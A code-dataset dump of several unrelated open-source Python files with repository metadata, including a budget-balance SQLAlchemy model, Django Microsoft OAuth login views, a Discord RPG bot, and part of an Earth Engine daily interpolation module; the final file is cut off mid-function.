] | 45 | 2019-12-23T23:45:10.000Z | 2022-03-31T05:01:22.000Z | backend/underbudget/models/balance.py | vimofthevine/underbudget4 | c90eecf9879f7ce57c77a68b3f83b1d76c4451af | [
"MIT"
] | 1 | 2020-12-26T17:16:58.000Z | 2020-12-26T17:16:58.000Z | """ Balance resource model """
import datetime
from sqlalchemy.sql import func
from underbudget.database import db
from underbudget.models.transaction import (
AccountTransactionModel,
EnvelopeTransactionModel,
TransactionModel,
)
class AccountBalanceModel:
    """ Account balance model """

    @staticmethod
    def get_balance(
        account_id: int,
        date: datetime.date,
    ) -> dict:
        """ Gets the balance of an account as of a particular date.

        Returns a dict with:
        - ``balance``: sum of all account-transaction amounts recorded on or
          before *date* (0 when there are none)
        - ``total``: number of matching transactions
        """
        result = (
            db.session.query(
                func.sum(AccountTransactionModel.amount).label("balance"), func.count()
            )
            .join(TransactionModel)
            .filter(AccountTransactionModel.account_id == account_id)
            .filter(TransactionModel.recorded_date <= date)
            .first()
        )
        if result:
            # SUM() is NULL (None) when no rows match even though the
            # aggregate row itself exists; normalize that to 0.
            balance = result[0] if result[0] is not None else 0
            return {"balance": balance, "total": result[1]}
        return {"balance": 0, "total": 0}
class EnvelopeBalanceModel:
    """ Envelope balance model """

    @staticmethod
    def get_balance(
        envelope_id: int,
        date: datetime.date,
    ) -> dict:
        """ Gets the balance of an envelope as of a particular date.

        Returns a dict with:
        - ``balance``: sum of all envelope-transaction amounts recorded on or
          before *date* (0 when there are none)
        - ``total``: number of matching transactions
        """
        result = (
            db.session.query(
                func.sum(EnvelopeTransactionModel.amount).label("balance"), func.count()
            )
            .join(TransactionModel)
            .filter(EnvelopeTransactionModel.envelope_id == envelope_id)
            .filter(TransactionModel.recorded_date <= date)
            .first()
        )
        if result:
            # SUM() is NULL (None) when no rows match even though the
            # aggregate row itself exists; normalize that to 0.
            balance = result[0] if result[0] is not None else 0
            return {"balance": balance, "total": result[1]}
        return {"balance": 0, "total": 0}
| 29.473684 | 88 | 0.589881 | """ Balance resource model """
import datetime
from sqlalchemy.sql import func
from underbudget.database import db
from underbudget.models.transaction import (
AccountTransactionModel,
EnvelopeTransactionModel,
TransactionModel,
)
class AccountBalanceModel:
    """ Account balance model """

    @staticmethod
    def get_balance(
        account_id: int,
        date: datetime.date,
    ) -> dict:
        """ Gets the balance of an account as of a particular date.

        Returns a dict with:
        - ``balance``: sum of all account-transaction amounts recorded on or
          before *date* (0 when there are none)
        - ``total``: number of matching transactions
        """
        result = (
            db.session.query(
                func.sum(AccountTransactionModel.amount).label("balance"), func.count()
            )
            .join(TransactionModel)
            .filter(AccountTransactionModel.account_id == account_id)
            .filter(TransactionModel.recorded_date <= date)
            .first()
        )
        if result:
            # SUM() is NULL (None) when no rows match even though the
            # aggregate row itself exists; normalize that to 0.
            balance = result[0] if result[0] is not None else 0
            return {"balance": balance, "total": result[1]}
        return {"balance": 0, "total": 0}
class EnvelopeBalanceModel:
    """ Envelope balance model """

    @staticmethod
    def get_balance(
        envelope_id: int,
        date: datetime.date,
    ) -> dict:
        """ Gets the balance of an envelope as of a particular date.

        Returns a dict with:
          - balance: sum of envelope transaction amounts recorded on or
            before ``date`` (0 when no transactions match)
          - total: number of matching transactions
        """
        result = (
            db.session.query(
                func.sum(EnvelopeTransactionModel.amount).label("balance"), func.count()
            )
            .join(TransactionModel)
            .filter(EnvelopeTransactionModel.envelope_id == envelope_id)
            .filter(TransactionModel.recorded_date <= date)
            .first()
        )
        if result:
            # SUM() yields NULL (None) when no rows match; coerce to 0 so
            # callers always receive a numeric balance.
            return {"balance": result[0] or 0, "total": result[1]}
        return {"balance": 0, "total": 0}
| 0 | 0 | 0 |
b675fdc219149ecf8b3d0e204b58ec851f06e738 | 1,034 | py | Python | data_processing.py | forhacks/study-tool-back | 139c24fe1e2295493af62da48b6896614f4e2560 | [
"MIT"
] | null | null | null | data_processing.py | forhacks/study-tool-back | 139c24fe1e2295493af62da48b6896614f4e2560 | [
"MIT"
] | null | null | null | data_processing.py | forhacks/study-tool-back | 139c24fe1e2295493af62da48b6896614f4e2560 | [
"MIT"
] | null | null | null | import numpy as np
import re
from gensim.models import Word2Vec
max_len = 25
print('-- READING DATA --')
# read in defs
with open("data/definitions.txt") as f:
data = f.readlines()
# remove \n at end
data = [process_def(x.strip()) for x in data]
# reorganize into [[def 1, def 2, 1/0], [def 1, def 2, 1/0], ...]
data = np.reshape(data, (-1, 3)).T
x = data[:2].T
y = [int(x) for x in data[2:][0]]
model = Word2Vec.load("trained/w2v/trained.w2v")
x = [[model.wv[word] for word in a] for a in x]
np.save('data/x.npy', x)
np.save('data/y.npy', y)
| 24.046512 | 78 | 0.636364 | import numpy as np
import re
from gensim.models import Word2Vec
max_len = 25
def process_def(definition):
if len(definition) == 1:
return definition
definition = re.sub("[^a-zA-Z\s]", " ", definition).split()
definition = [a for a in definition if len(a) > 2]
def_arr = np.array(definition)
word_count = len(def_arr)
stretch = ([max_len/word_count + 1] * (max_len % word_count))
stretch.extend([max_len/word_count] * (word_count - max_len % word_count))
def_arr = np.repeat(def_arr, stretch)
return def_arr
print('-- READING DATA --')
# read in defs
with open("data/definitions.txt") as f:
data = f.readlines()
# remove \n at end
data = [process_def(x.strip()) for x in data]
# reorganize into [[def 1, def 2, 1/0], [def 1, def 2, 1/0], ...]
data = np.reshape(data, (-1, 3)).T
x = data[:2].T
y = [int(x) for x in data[2:][0]]
model = Word2Vec.load("trained/w2v/trained.w2v")
x = [[model.wv[word] for word in a] for a in x]
np.save('data/x.npy', x)
np.save('data/y.npy', y)
| 454 | 0 | 23 |
1de5aae6b063475c9c8982362905164051ea6329 | 812 | py | Python | Week4/task2-3.py | Ivancaminal72/mcv-m6-2018-team3 | dcdbc97d6d9534f1c0479e98113f35bca0084d86 | [
"MIT"
] | 1 | 2019-06-08T10:27:08.000Z | 2019-06-08T10:27:08.000Z | Week4/task2-3.py | Ivancaminal72/mcv-m6-2018-team3 | dcdbc97d6d9534f1c0479e98113f35bca0084d86 | [
"MIT"
] | null | null | null | Week4/task2-3.py | Ivancaminal72/mcv-m6-2018-team3 | dcdbc97d6d9534f1c0479e98113f35bca0084d86 | [
"MIT"
] | 1 | 2018-09-16T22:17:06.000Z | 2018-09-16T22:17:06.000Z | from utils import *
import os
import numpy as np
from video_stabilization import video_stabilization
PlotsDirectory = '../plots/Week4/task2-3/'
if not os.path.exists(PlotsDirectory):
os.makedirs(PlotsDirectory)
print("reading video...")
seq_color = video_to_frame('video1.mp4', grayscale=False)
max_size = 100
seq_color = seq_color[0:max_size]
#block_size_x, block_size_y, search_area_x, search_area_y = 20, 20, 20, 20
#print("stabilizing video...")
#print(seq_color.shape)
#est_seq = video_stabilization(seq_color, block_size_x, block_size_y, search_area_x, search_area_y,
# compensation='backward', grayscale=False, resize=(320, 240))
#print("saving video...")
#np.save(PlotsDirectory + 'own_stabilization.npy', est_seq)
write_images2(seq_color, PlotsDirectory, 'seq_')
| 30.074074 | 99 | 0.743842 | from utils import *
import os
import numpy as np
from video_stabilization import video_stabilization
PlotsDirectory = '../plots/Week4/task2-3/'
# Create the output directory for this task's plots if needed.
if not os.path.exists(PlotsDirectory):
    os.makedirs(PlotsDirectory)
print("reading video...")
# Decode the video into an array of color frames (helper from utils).
seq_color = video_to_frame('video1.mp4', grayscale=False)
# Keep only the first 100 frames to bound memory/runtime.
max_size = 100
seq_color = seq_color[0:max_size]
# Stabilization pass is currently disabled; only raw frames are exported.
#block_size_x, block_size_y, search_area_x, search_area_y = 20, 20, 20, 20
#print("stabilizing video...")
#print(seq_color.shape)
#est_seq = video_stabilization(seq_color, block_size_x, block_size_y, search_area_x, search_area_y,
#                           compensation='backward', grayscale=False, resize=(320, 240))
#print("saving video...")
#np.save(PlotsDirectory + 'own_stabilization.npy', est_seq)
# Write each frame out as an image with a 'seq_' filename prefix.
write_images2(seq_color, PlotsDirectory, 'seq_')
| 0 | 0 | 0 |
460e22311c49b2fe9b2c2d655315d937aeac865b | 813 | py | Python | server/django/src/website/admin.py | tnakagami/home_server | 99071aa047f8635c53cd7dfa9ed812bff6a6cd0c | [
"Apache-2.0"
] | null | null | null | server/django/src/website/admin.py | tnakagami/home_server | 99071aa047f8635c53cd7dfa9ed812bff6a6cd0c | [
"Apache-2.0"
] | null | null | null | server/django/src/website/admin.py | tnakagami/home_server | 99071aa047f8635c53cd7dfa9ed812bff6a6cd0c | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
from import_export import resources
from import_export.admin import ImportExportModelAdmin
from . import models
@admin.register(models.ControllerLink)
@admin.register(models.ControllerCommand)
| 32.52 | 57 | 0.767528 | from django.contrib import admin
from import_export import resources
from import_export.admin import ImportExportModelAdmin
from . import models
class ControllerLinkResource(resources.ModelResource):
    """django-import-export resource mapping ControllerLink rows."""
    class Meta:
        model = models.ControllerLink
class ControllerCommandResource(resources.ModelResource):
    """django-import-export resource mapping ControllerCommand rows."""
    class Meta:
        model = models.ControllerCommand
@admin.register(models.ControllerLink)
class ControllerLinkAdmin(ImportExportModelAdmin):
    """Admin page for ControllerLink with CSV/XLSX import-export support."""
    ordering = ('id', )
    list_display = ('id', 'name', 'link_name', 'detail')
    resource_class = ControllerLinkResource
@admin.register(models.ControllerCommand)
class ControllerCommandAdmin(ImportExportModelAdmin):
    """Admin page for ControllerCommand with CSV/XLSX import-export support."""
    ordering = ('id', )
    list_display = ('id', 'task_name', 'link', 'command')
    resource_class = ControllerCommandResource
| 0 | 495 | 90 |
7f352b13447c3e217095218dd87a8d7019d83f3a | 7,803 | py | Python | uwu.py | CapnS/uwu-bot | 3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04 | [
"MIT"
] | null | null | null | uwu.py | CapnS/uwu-bot | 3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04 | [
"MIT"
] | null | null | null | uwu.py | CapnS/uwu-bot | 3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
import traceback
import asyncio
import asyncpg
import yaml # removed aiofiles because its not needed
from datetime import datetime
import os
import sys
import logging
import aiohttp
import aioredis
import psutil
import discord
from utils import errorhandler
import logging.handlers
import lavalink
import utils
logger = logging.getLogger("bot")
logger.setLevel(logging.INFO)
handler = logging.handlers.TimedRotatingFileHandler(
filename=f"logs/bot.log",
encoding="utf-8",
when="D",
interval=1,
utc=True,
backupCount=10,
)
handler.setFormatter(
logging.Formatter("[%(asctime)s:%(levelname)s:%(name)s] %(message)s")
)
logger.addHandler(handler)
try:
import uvloop
except ImportError:
if (
sys.platform == "linux"
): # alert the user to install uvloop if they are on a linux system
print("UVLoop not detected")
else:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
description = """uwu. A RPG bot made by mellowmarshe#0001"""
startup_extensions = [
"jishaku",
"utils.errorhandler",
"modules.create",
"modules.exploring",
"modules.owner",
"modules.uwulonian",
"modules.misc",
"modules.patron",
"modules.DBL",
"modules.uwus",
"modules.events",
"modules.daily",
"modules.pets",
"modules.help",
"modules.votes",
"modules.logging",
"modules.music",
"modules.moderation",
]
prefixes = ["uwu ", "|"]
if __name__ == "__main__":
uwu().run()
| 31.46371 | 120 | 0.607587 | import discord
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
import traceback
import asyncio
import asyncpg
import yaml # removed aiofiles because its not needed
from datetime import datetime
import os
import sys
import logging
import aiohttp
import aioredis
import psutil
import discord
from utils import errorhandler
import logging.handlers
import lavalink
import utils
logger = logging.getLogger("bot")
logger.setLevel(logging.INFO)
handler = logging.handlers.TimedRotatingFileHandler(
filename=f"logs/bot.log",
encoding="utf-8",
when="D",
interval=1,
utc=True,
backupCount=10,
)
handler.setFormatter(
logging.Formatter("[%(asctime)s:%(levelname)s:%(name)s] %(message)s")
)
logger.addHandler(handler)
try:
import uvloop
except ImportError:
if (
sys.platform == "linux"
): # alert the user to install uvloop if they are on a linux system
print("UVLoop not detected")
else:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
description = """uwu. A RPG bot made by mellowmarshe#0001"""
startup_extensions = [
"jishaku",
"utils.errorhandler",
"modules.create",
"modules.exploring",
"modules.owner",
"modules.uwulonian",
"modules.misc",
"modules.patron",
"modules.DBL",
"modules.uwus",
"modules.events",
"modules.daily",
"modules.pets",
"modules.help",
"modules.votes",
"modules.logging",
"modules.music",
"modules.moderation",
]
prefixes = ["uwu ", "|"]
class uwu(commands.Bot):
    """Main bot class: wires up config, databases, caches and event handlers."""

    def __init__(self):
        super().__init__(
            command_prefix=self.get_pre,
            case_insensitive=True,
            description=description,
            reconnect=True,
            status=discord.Status.idle,
            activity=discord.Game("Booting up"),
        )
        self.launch_time = datetime.utcnow()
        # NOTE(review): yaml.load without Loader= and an unclosed file handle;
        # yaml.safe_load inside a `with` block would be safer.
        self.config = yaml.load(open("config.yml"))
        self.pool = None  # pool is unset till the bot is ready
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.process = psutil.Process(os.getpid())
        self.loop = asyncio.get_event_loop()
        self.logger = logging.getLogger("bot")
        self.blacklisted = []
        self.patrons = []
        self.prefixes = {}
        self.commands_ran = 0
        self.add_check(self.global_cooldown)

    # Shared cooldown bucket used by global_cooldown(): 1 command / 4 s / user.
    map = commands.CooldownMapping.from_cooldown(1, 4, commands.BucketType.user)

    async def get_pre(self, bot, message):
        """Resolve the command prefix: per-guild override or the defaults."""
        if not message.guild:
            return commands.when_mentioned_or(*prefixes)(bot, message)
        try:
            prefixess = bot.prefixes[message.guild.id]
            if prefixess:
                return commands.when_mentioned_or(prefixess)(bot, message)
        except KeyError:
            # Guild has no custom prefix cached; fall back to the defaults.
            return commands.when_mentioned_or(*prefixes)(bot, message)

    async def global_cooldown(self, ctx: commands.Context):
        """Global check: rate limit every user to one command per 4 seconds."""
        bucket = self.map.get_bucket(ctx.message)
        retry_after = bucket.update_rate_limit()
        if retry_after:
            raise errorhandler.IsRatelimited(ctx, retry_after)
        else:
            return True

    async def start(self):
        """Load all extensions (best effort), then connect to Discord."""
        for ext in startup_extensions:
            try:
                self.load_extension(ext)
            except BaseException as e:
                # A single broken extension should not prevent startup.
                print(f"Failed to load {ext}\n{type(e).__name__}: {e}")
        await super().start(self.config["token"])

    async def on_message_edit(self, before, after):
        """Re-run command processing when a message is edited into a command."""
        if after.author.bot:
            return
        ctx = await self.get_context(after)
        if ctx.command:
            if after.author.id in self.blacklisted:
                return await after.channel.send(
                    f"You may not use uwu. You were blacklisted."
                )
            await self.process_commands(after)

    async def on_message(self, message):
        """Dispatch commands, ignoring bots and blacklisted users."""
        if message.author.bot:
            return
        ctx = await self.get_context(message)
        if ctx.command:
            if message.author.id in self.blacklisted:
                return await message.channel.send(
                    f"You may not use uwu. You were blacklisted."
                )
            await self.process_commands(message)

    async def init_conns(self):
        """Open all external connections (databases, then Lavalink)."""
        await self.init_dbs()
        await self.init_ll()

    async def init_dbs(self):
        """Connect to Redis and create the Postgres connection pool."""
        self.redis = await aioredis.create_redis_pool(
            "redis://localhost",
            password=self.config["redispassword"],
            minsize=5,
            maxsize=10,
            loop=self.loop,
        )
        credentials = {
            "user": self.config["dbuser"],
            "password": self.config["dbpassword"],
            "database": self.config["dbname"],
            "host": "127.0.0.1",
        }
        self.pool = await asyncpg.create_pool(**credentials, max_size=150)

    async def init_ll(self):
        """Connect the Lavalink audio client and hook its voice events."""
        self.lavalink = lavalink.Client(self.user.id)
        self.lavalink.add_node(
            self.config["lavalink_ip"], 8080, self.config["lavalink"], "us", "us-east"
        )
        self.add_listener(self.lavalink.voice_update_handler, "on_socket_response")

    async def on_ready(self):
        """Finish startup: connect services, apply schema and warm caches."""
        await self.init_conns()
        with open("utils/schema.sql") as f:
            await self.pool.execute(f.read())
        print("Bot ready!")
        # Warm the in-memory blacklist/patron/prefix caches from Postgres.
        bl_users = await self.pool.fetch("SELECT * FROM blacklists")
        patrons = await self.pool.fetch("SELECT * FROM p_users")
        prefixes = await self.pool.fetch("SELECT guild_id, prefix FROM guild_prefixes")
        for i in prefixes:
            self.prefixes[i[0]] = i[1]
        for i in range(len(bl_users)):
            self.blacklisted.append(int(bl_users[i]["user_id"]))
        self.logger.info(f"[Start] Blacklisted users added.")
        for i in range(len(patrons)):
            self.patrons.append(int(patrons[i]["user_id"]))
        self.logger.info(f"[Start] Patrons added.")
        game = discord.Game("with fwends")
        await self.change_presence(status=discord.Status.dnd, activity=game)
        self.logger.info(
            f"[Start] Bot started with {len(self.guilds)} guilds and {len(self.users)} users."
        )

    async def on_command_completion(self, ctx):
        """Count successfully completed commands."""
        self.commands_ran += 1

    async def process_commands(self, message):
        """Invoke the matched command using the project's custom Context."""
        ctx = await self.get_context(message, cls=utils.context.Context)
        if ctx.command is None:
            return
        await self.invoke(ctx)

    async def on_message_delete(self, message):
        """Record the most recent deleted message per channel (snipe support)."""
        content = message.content
        msg_type_o = 0
        if message.attachments:
            content = message.attachments[0].proxy_url
            msg_type_o = 1
        if message.embeds:
            content = message.embeds[0].description
            msg_type_o = 2
        try:
            await self.pool.execute(
                """INSERT INTO del_snipe (guild_id, user_id, channel_id, message, msg_type) VALUES ($1, $2, $3, $4, $5)
                ON CONFLICT (channel_id) DO UPDATE SET user_id = $2, message = $4, msg_type = $5""",
                message.guild.id,
                message.author.id,
                message.channel.id,
                content,
                msg_type_o,
            )
        except:
            # NOTE(review): bare except silently drops DB failures (and DMs,
            # where message.guild is None).
            pass

    async def on_guild_remove(self, guild):
        """Decrement the Redis guild counter and log the departure."""
        await self.redis.execute("DECR", "current_guilds")
        self.logger.info(
            f"[Guild] Left guild {guild.name}({guild.id}) with {len(guild.members)} members"
        )

    async def on_guild_join(self, guild):
        """Increment the Redis guild counter and log the join."""
        await self.redis.execute("INCR", "current_guilds")
        self.logger.info(
            f"[Guild] Joined guild {guild.name}({guild.id}) with {len(guild.members)} members"
        )
uwu().run()
| 5,706 | 489 | 23 |
4c1890046ab803b3871ec96ec6882ad7a0af8294 | 975 | py | Python | microsoft_authentication/views.py | akaytatsu/django-microsoft-authentication | 8c0c42abc8aae40ebeac4100acc0564f296c6406 | [
"MIT"
] | 3 | 2021-02-26T08:32:21.000Z | 2021-07-29T14:10:11.000Z | microsoft_authentication/views.py | akaytatsu/django-microsoft-authentication | 8c0c42abc8aae40ebeac4100acc0564f296c6406 | [
"MIT"
] | 2 | 2021-06-21T23:00:23.000Z | 2021-07-02T09:32:00.000Z | microsoft_authentication/views.py | akaytatsu/django-microsoft-authentication | 8c0c42abc8aae40ebeac4100acc0564f296c6406 | [
"MIT"
] | 2 | 2021-06-21T22:18:11.000Z | 2021-10-11T12:34:02.000Z | from django.http import HttpResponseRedirect, HttpResponseForbidden
from django.contrib.auth import login, logout
from django.conf import settings
from microsoft_authentication.auth.auth_utils import (
get_sign_in_flow,
get_token_from_code,
get_user,
get_django_user,
get_logout_url,
)
| 27.083333 | 72 | 0.733333 | from django.http import HttpResponseRedirect, HttpResponseForbidden
from django.contrib.auth import login, logout
from django.conf import settings
from microsoft_authentication.auth.auth_utils import (
get_sign_in_flow,
get_token_from_code,
get_user,
get_django_user,
get_logout_url,
)
def microsoft_login(request):
    """Start the Microsoft OAuth sign-in and redirect the user to it.

    The sign-in flow is stashed in the session so callback() can finish
    the token exchange later.
    """
    flow = get_sign_in_flow()
    try:
        request.session['auth_flow'] = flow
    except Exception as e:
        # NOTE(review): best-effort session write; failures are only printed,
        # which means callback() may later miss 'auth_flow' — consider logging
        # and surfacing this instead.
        print(e)
    return HttpResponseRedirect(flow['auth_uri'])
def microsoft_logout(request):
    """Log out of the Django session, then redirect to Microsoft's logout URL."""
    logout(request)
    return HttpResponseRedirect(get_logout_url())
def callback(request):
    """OAuth redirect endpoint: exchange the auth code and log the user in.

    Returns 403 when the Microsoft account's email has no matching Django
    user; otherwise redirects to LOGIN_REDIRECT_URL (or /admin).
    """
    result = get_token_from_code(request)
    ms_user = get_user(result['access_token'])
    # NOTE(review): assumes the Graph profile always exposes 'mail'; some
    # accounts only populate 'userPrincipalName' — confirm against tenant.
    user = get_django_user(email=ms_user['mail'])
    if user:
        login(request, user)
    else:
        return HttpResponseForbidden("Invalid email for this app.")
    return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL or "/admin")
| 597 | 0 | 69 |
a4f80aad75cf3811b8a00b25c929d27b04510ba0 | 1,206 | py | Python | ipb_homework_checker/check_homework.py | PRBonn/ipb_homework_checker | 750a42d19a6fb6f8d18785bd8bc1d7aea9caba50 | [
"Apache-2.0"
] | 11 | 2018-12-18T16:21:58.000Z | 2021-07-11T06:31:24.000Z | ipb_homework_checker/check_homework.py | PRBonn/ipb_homework_checker | 750a42d19a6fb6f8d18785bd8bc1d7aea9caba50 | [
"Apache-2.0"
] | 1 | 2018-12-18T00:43:23.000Z | 2018-12-18T00:43:23.000Z | ipb_homework_checker/check_homework.py | PRBonn/ipb_homework_checker | 750a42d19a6fb6f8d18785bd8bc1d7aea9caba50 | [
"Apache-2.0"
] | 3 | 2020-08-15T16:07:17.000Z | 2020-11-15T20:23:00.000Z | #!/usr/bin/python3
"""Script to check this homework."""
import argparse
import logging
from .checker import Checker
from .md_writer import MdWriter
logging.basicConfig()
log = logging.getLogger("GHC")
log.setLevel(logging.INFO)
def main():
    """Run this script."""
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument(
        '-v', '--verbose',
        help='Make the output verbose.',
        action='store_true')
    arg_parser.add_argument(
        '-i', '--input',
        help='An input *.yml file with the job definition.',
        required=True)
    arg_parser.add_argument(
        '-o', '--output',
        help='An output *.md file with the results.',
        required=True)
    parsed_args = arg_parser.parse_args()

    if parsed_args.verbose:
        log.setLevel(logging.DEBUG)
        log.debug('Enable DEBUG logging.')

    # Run the checker over the job definition file.
    log.debug('Reading from file "%s"', parsed_args.input)
    homework_results = Checker(parsed_args.input).check_homework()

    # Collect the results into a markdown report and write it out.
    writer = MdWriter()
    writer.update(homework_results)
    log.debug('Writing to file "%s"', parsed_args.output)
    writer.write_md_file(parsed_args.output)
if __name__ == "__main__":
main()
| 25.659574 | 60 | 0.637645 | #!/usr/bin/python3
"""Script to check this homework."""
import argparse
import logging
from .checker import Checker
from .md_writer import MdWriter
logging.basicConfig()
log = logging.getLogger("GHC")
log.setLevel(logging.INFO)
def main():
    """Run this script."""
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument(
        '-v', '--verbose',
        help='Make the output verbose.',
        action='store_true')
    arg_parser.add_argument(
        '-i', '--input',
        help='An input *.yml file with the job definition.',
        required=True)
    arg_parser.add_argument(
        '-o', '--output',
        help='An output *.md file with the results.',
        required=True)
    parsed_args = arg_parser.parse_args()

    if parsed_args.verbose:
        log.setLevel(logging.DEBUG)
        log.debug('Enable DEBUG logging.')

    # Run the checker over the job definition file.
    log.debug('Reading from file "%s"', parsed_args.input)
    homework_results = Checker(parsed_args.input).check_homework()

    # Collect the results into a markdown report and write it out.
    writer = MdWriter()
    writer.update(homework_results)
    log.debug('Writing to file "%s"', parsed_args.output)
    writer.write_md_file(parsed_args.output)
if __name__ == "__main__":
main()
| 0 | 0 | 0 |
b3a96457def15d3ea68d7d61ff73d5f543998c9c | 785 | py | Python | Hacker rank/he.py | arghasen/Poker | ea4f4c41371b0bab2540e79141915fd7405dcb43 | [
"MIT"
] | null | null | null | Hacker rank/he.py | arghasen/Poker | ea4f4c41371b0bab2540e79141915fd7405dcb43 | [
"MIT"
] | null | null | null | Hacker rank/he.py | arghasen/Poker | ea4f4c41371b0bab2540e79141915fd7405dcb43 | [
"MIT"
] | null | null | null | T = int(raw_input())
for t in range(T):
n, m = map(int, raw_input().split())
powers = {}
bullets = {}
origBullet = 0
levelBullet = 0
for ni in range( n):
powers[ni] = map(int, raw_input().split())
for ni in range( n):
bullets[ni] = map(int, raw_input().split())
bullets[-1] = [0 for _ in range(m)]
dpminbul={}
print minbul() | 35.681818 | 175 | 0.55414 | T = int(raw_input())
for t in range(T):
n, m = map(int, raw_input().split())
powers = {}
bullets = {}
origBullet = 0
levelBullet = 0
for ni in range( n):
powers[ni] = map(int, raw_input().split())
for ni in range( n):
bullets[ni] = map(int, raw_input().split())
bullets[-1] = [0 for _ in range(m)]
dpminbul={}
    def minbul(level=0):
        # Memoized DP (Python 2 script): minimum total bullets needed to
        # clear levels `level`..n-1, choosing one enemy column i and one
        # carried-bullet column j per level.
        # NOTE(review): dpminbul.get(level) treats a memoized value of 0 as
        # "missing", so zero-cost subproblems are recomputed (slow, not wrong).
        if dpminbul.get(level):
            return dpminbul[level]
        # Bullets dropped by the previous level (row -1 is all zeros).
        levelBullet = bullets[level-1]
        if level ==n:
            return 0
        # Buy only the shortfall (power - carried bullets) when it is positive.
        dpminbul[level]=min([powers[level][i]-levelBullet[j]+minbul(level+1)if powers[level][i]-levelBullet[j] >0 else minbul(level+1)for i in range(m) for j in range(m)])
        return dpminbul[level]
print minbul() | 379 | 0 | 26 |
1b68728e4c9fce3d77e5260d475642a9f4616673 | 49,516 | py | Python | openet/core/interpolate.py | torresrua/openet-core-beta | 95f830164ed579f72fc383ac4e1fa6b6b11bdbac | [
"Apache-2.0"
] | null | null | null | openet/core/interpolate.py | torresrua/openet-core-beta | 95f830164ed579f72fc383ac4e1fa6b6b11bdbac | [
"Apache-2.0"
] | null | null | null | openet/core/interpolate.py | torresrua/openet-core-beta | 95f830164ed579f72fc383ac4e1fa6b6b11bdbac | [
"Apache-2.0"
] | 1 | 2021-08-17T04:37:23.000Z | 2021-08-17T04:37:23.000Z | import datetime
import logging
import ee
from dateutil.relativedelta import *
from . import utils
# import openet.core.utils as utils
def daily(target_coll, source_coll, interp_days=32, interp_method='linear',
          use_joins=False, compute_product=False):
    """Interpolate non-daily source images to a daily target image collection

    Parameters
    ----------
    target_coll : ee.ImageCollection
        Source images will be interpolated to each target image time_start.
        Target images should have a daily time step. This will typically be
        the reference ET (ETr) collection.
    source_coll : ee.ImageCollection
        Images that will be interpolated to the target image collection.
        This will typically be the fraction of reference ET (ETrF) collection.
    interp_days : int, optional
        Number of days before and after each image date to include in the
        interpolation (the default is 32).
    interp_method : {'linear'}, optional
        Interpolation method (the default is 'linear').
    use_joins : bool, optional
        If True, the source collection will be joined to the target collection
        before mapping/interpolation and the source images will be extracted
        from the join properties ('prev' and 'next').
        Setting use_joins=True should be more memory efficient.
        If False, the source images will be built by filtering the source
        collection separately for each image in the target collection
        (inside the mapped function).
    compute_product : bool, optional
        If True, compute the product of the target and all source image bands.
        The default is False.

    Returns
    -------
    ee.ImageCollection() of daily interpolated images

    Raises
    ------
    ValueError
        If `interp_method` is not a supported method.

    """
    # Join filters: source images within (interp_days + 1) days strictly
    # before (prev) or on/after (next) each target image time_start.
    prev_filter = ee.Filter.And(
        ee.Filter.maxDifference(
            difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
            leftField='system:time_start',
            rightField='system:time_start',
        ),
        ee.Filter.greaterThan(
            leftField='system:time_start',
            rightField='system:time_start',
        )
    )
    next_filter = ee.Filter.And(
        ee.Filter.maxDifference(
            difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
            leftField='system:time_start',
            rightField='system:time_start',
        ),
        ee.Filter.lessThanOrEquals(
            leftField='system:time_start',
            rightField='system:time_start',
        )
    )
    if use_joins:
        # Join the neighboring Landsat images in time
        target_coll = ee.ImageCollection(
            ee.Join.saveAll(
                matchesKey='prev',
                ordering='system:time_start',
                ascending=True,
                outer=True,
            ).apply(
                primary=target_coll,
                secondary=source_coll,
                condition=prev_filter,
            )
        )
        target_coll = ee.ImageCollection(
            ee.Join.saveAll(
                matchesKey='next',
                ordering='system:time_start',
                ascending=False,
                outer=True,
            ).apply(
                primary=target_coll,
                secondary=source_coll,
                condition=next_filter,
            )
        )
    # # DEADBEEF - This module is assuming that the time band is already in
    # #   the source collection.
    # # Uncomment the following to add a time band here instead.
    # def add_utc0_time_band(image):
    #     date_0utc = utils.date_0utc(ee.Date(image.get('system:time_start')))
    #     return image.addBands([
    #         image.select([0]).double().multiply(0).add(date_0utc.millis())\
    #             .rename(['time'])])
    # source_coll = ee.ImageCollection(source_coll.map(add_utc0_time_band))
    if interp_method.lower() == 'linear':
        def _linear(image):
            """Linearly interpolate source images to target image time_start(s)

            Parameters
            ----------
            image : ee.Image.
                The first band in the image will be used as the "target" image
                and will be returned with the output image.

            Returns
            -------
            ee.Image of interpolated values with band name 'src'

            Notes
            -----
            The source collection images must have a time band.
            This function is intended to be mapped over an image collection and
            can only take one input parameter.

            """
            # target_img = ee.Image(image).select(0).double()
            target_date = ee.Date(image.get('system:time_start'))
            # All filtering will be done based on 0 UTC dates
            utc0_date = utils.date_0utc(target_date)
            # utc0_time = target_date.update(hour=0, minute=0, second=0)\
            #     .millis().divide(1000).floor().multiply(1000)
            time_img = ee.Image.constant(utc0_date.millis()).double()
            # Build nodata images/masks that can be placed at the front/back of
            # of the qm image collections in case the collections are empty.
            bands = source_coll.first().bandNames()
            prev_qm_mask = ee.Image.constant(ee.List.repeat(1, bands.length()))\
                .double().rename(bands).updateMask(0)\
                .set({
                    'system:time_start': utc0_date.advance(
                        -interp_days - 1, 'day').millis()})
            next_qm_mask = ee.Image.constant(ee.List.repeat(1, bands.length()))\
                .double().rename(bands).updateMask(0)\
                .set({
                    'system:time_start': utc0_date.advance(
                        interp_days + 2, 'day').millis()})
            if use_joins:
                # Build separate mosaics for before and after the target date
                prev_qm_img = ee.ImageCollection\
                    .fromImages(ee.List(ee.Image(image).get('prev')))\
                    .merge(ee.ImageCollection(prev_qm_mask))\
                    .sort('system:time_start', True)\
                    .mosaic()
                next_qm_img = ee.ImageCollection\
                    .fromImages(ee.List(ee.Image(image).get('next')))\
